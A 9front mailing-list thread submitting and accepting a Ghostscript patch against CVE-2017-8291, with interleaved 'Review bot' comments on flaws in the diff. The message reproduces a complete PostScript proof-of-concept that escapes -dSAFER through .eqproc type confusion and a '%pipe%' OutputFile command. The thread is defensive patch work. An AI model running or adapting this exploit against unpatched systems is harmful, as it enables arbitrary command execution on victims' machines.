* Re: [9front] ghostscript: Mitigations against CVE-2017-8291
@ 2019-06-21 16:57 cinap_lenrek
0 siblings, 0 replies; 2+ messages in thread
From: cinap_lenrek @ 2019-06-21 16:57 UTC (permalink / raw)
To: 9front
applied, thank you!
--
cinap
* [9front] ghostscript: Mitigations against CVE-2017-8291
@ 2019-06-21 10:53 Jacob Moody
From: Jacob Moody @ 2019-06-21 10:53 UTC (permalink / raw)
To: 9front
All,
Grabbed the upstream changes for the mitigation against CVE-2017-8291.
The proofs of concept I found online do not seem to do anything
interesting besides hang gs indefinitely or suicide.
To reproduce:
gs -q -dNOPAUSE -dSAFER '-sDEVICE=ppmraw' '-sOutputFile=/dev/null' <<.
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100
/size_from 10000 def
/size_step 500 def
/size_to 65000 def
/enlarge 1000 def
%/bigarr 65000 array def
0
size_from size_step size_to {
pop
1 add
} for
/buffercount exch def
/buffersizes buffercount array def
0
size_from size_step size_to {
buffersizes exch 2 index exch put
1 add
} for
pop
/buffers buffercount array def
0 1 buffercount 1 sub {
/ind exch def
buffersizes ind get /cursize exch def
cursize string /curbuf exch def
buffers ind curbuf put
cursize 16 sub 1 cursize 1 sub {
curbuf exch 255 put
} for
} for
/buffersearchvars [0 0 0 0 0] def
/sdevice [0] def
enlarge array aload
{
.eqproc
buffersearchvars 0 buffersearchvars 0 get 1 add put
buffersearchvars 1 0 put
buffersearchvars 2 0 put
buffercount {
buffers buffersearchvars 1 get get
buffersizes buffersearchvars 1 get get
16 sub get
254 le {
buffersearchvars 2 1 put
buffersearchvars 3 buffers buffersearchvars 1 get get put
buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put
} if
buffersearchvars 1 buffersearchvars 1 get 1 add put
} repeat
buffersearchvars 2 get 1 ge {
exit
} if
%(.) print
} loop
.eqproc
.eqproc
.eqproc
sdevice 0
currentdevice
buffersearchvars 3 get buffersearchvars 4 get 16#7e put
buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put
buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put
put
buffersearchvars 0 get array aload
sdevice 0 get
16#3e8 0 put
sdevice 0 get
16#3b0 0 put
sdevice 0 get
16#3f0 0 put
currentdevice null false mark /OutputFile (%pipe%echo gotce)
.putdeviceparams
1 true .outputpage
.rsdparams
%{ } loop
0 0 .quit
%asdf
.
Patch:
diff -r 986e26228cfe sys/src/cmd/gs/src/zfrsd.c
--- a/sys/src/cmd/gs/src/zfrsd.c Thu May 23 14:59:28 2019 +0200
+++ b/sys/src/cmd/gs/src/zfrsd.c Fri Jun 21 05:34:42 2019 -0500
@@ -47,13 +47,19 @@
ref *pFilter;
ref *pDecodeParms;
int Intent;
- bool AsyncRead;
+ bool AsyncRead = false;
ref empty_array, filter1_array, parms1_array;
uint i;
- int code;
+ int code = 0;
+
+ if (ref_stack_count(&o_stack) < 1)
+ return_error(e_stackunderflow);
+ if (!r_has_type(op, t_dictionary) && !r_has_type(op, t_null))
+ return_error(e_typecheck);
make_empty_array(&empty_array, a_readonly);
- if (dict_find_string(op, "Filter", &pFilter) > 0) {
+ if (r_has_type(op, t_dictionary)
+ && dict_find_string(op, "Filter", &pFilter) > 0) {
if (!r_is_array(pFilter)) {
if (!r_has_type(pFilter, t_name))
return_error(e_typecheck);
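Review bot: with the new `r_has_type(op, t_dictionary) &&` guard, a null operand now skips the Filter lookup entirely, yet `pFilter` is declared uninitialized at the top of this hunk (`ref *pFilter;`) and is dereferenced in the next hunk as `op[-1] = *pFilter;`. The lines shown do not include the `else` branch that has to assign `pFilter = &empty_array;` (and clear `pDecodeParms`) for the null case; please confirm it is present, since `make_empty_array(&empty_array, a_readonly);` is set up right before the test for exactly that purpose. The order of the two new checks is correct: `ref_stack_count(&o_stack) < 1` is tested before `op` is dereferenced by `r_has_type`.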
@@ -92,10 +98,12 @@
return_error(e_typecheck);
}
}
- if ((code = dict_int_param(op, "Intent", 0, 3, 0, &Intent)) < 0 ||
- (code = dict_bool_param(op, "AsyncRead", false, &AsyncRead)) < 0
- )
- return code;
+ if (r_has_type(op, t_dictionary))
+ code = dict_int_param(op, "Intent", 0, 3, 0, &Intent);
+
+ if (r_has_type(op, t_dictionary))
+ if ((code = dict_bool_param(op, "AsyncRead", false, &AsyncRead)) < 0)
+ return code;
push(1);
op[-1] = *pFilter;
if (pDecodeParms)
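Review bot: the `Intent` result is no longer checked. The removed lines returned `code` when `dict_int_param(op, "Intent", 0, 3, 0, &Intent)` failed; the replacement assigns the result to `code` and then, two lines later, overwrites `code` with the `AsyncRead` result, so an out-of-range or wrong-typed /Intent now falls through to `push(1)` instead of raising the error it used to. Suggest keeping the check and folding the two identical `r_has_type` tests into one block, e.g.
    if (r_has_type(op, t_dictionary)) {
        if ((code = dict_int_param(op, "Intent", 0, 3, 0, &Intent)) < 0 ||
            (code = dict_bool_param(op, "AsyncRead", false, &AsyncRead)) < 0)
            return code;
    }
which also removes the brace-less `if` nested inside an `if`, a construction that is easy to misread.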
diff -r 986e26228cfe sys/src/cmd/gs/src/zmisc3.c
--- a/sys/src/cmd/gs/src/zmisc3.c Thu May 23 14:59:28 2019 +0200
+++ b/sys/src/cmd/gs/src/zmisc3.c Fri Jun 21 05:34:42 2019 -0500
@@ -55,6 +55,12 @@
ref2_t stack[MAX_DEPTH + 1];
ref2_t *top = stack;
+ if (ref_stack_count(&o_stack) < 2)
+ return_error(e_stackunderflow);
+ if (!r_is_array(op - 1) || !r_is_array(op)) {
+ return_error(e_typecheck);
+ }
+
make_array(&stack[0].proc1, 0, 1, op - 1);
make_array(&stack[0].proc2, 0, 1, op);
for (;;) {
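Review bot: bracing is inconsistent between the two new checks: the `ref_stack_count` test has no braces while the `r_is_array` test does; pick one style for both. The checks themselves are correct and in the right order: the stack depth is verified before `op - 1` is touched, and `r_is_array` rejects the non-array operands that the proof of concept above feeds to `.eqproc` (it pushes the contents of `enlarge array aload` and calls `.eqproc` on whatever is on top). The `for (;;)` loop below still walks into nested elements of the two procedures; whether those sub-elements need an equivalent type check is outside this hunk and worth a look.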
Thanks,
moody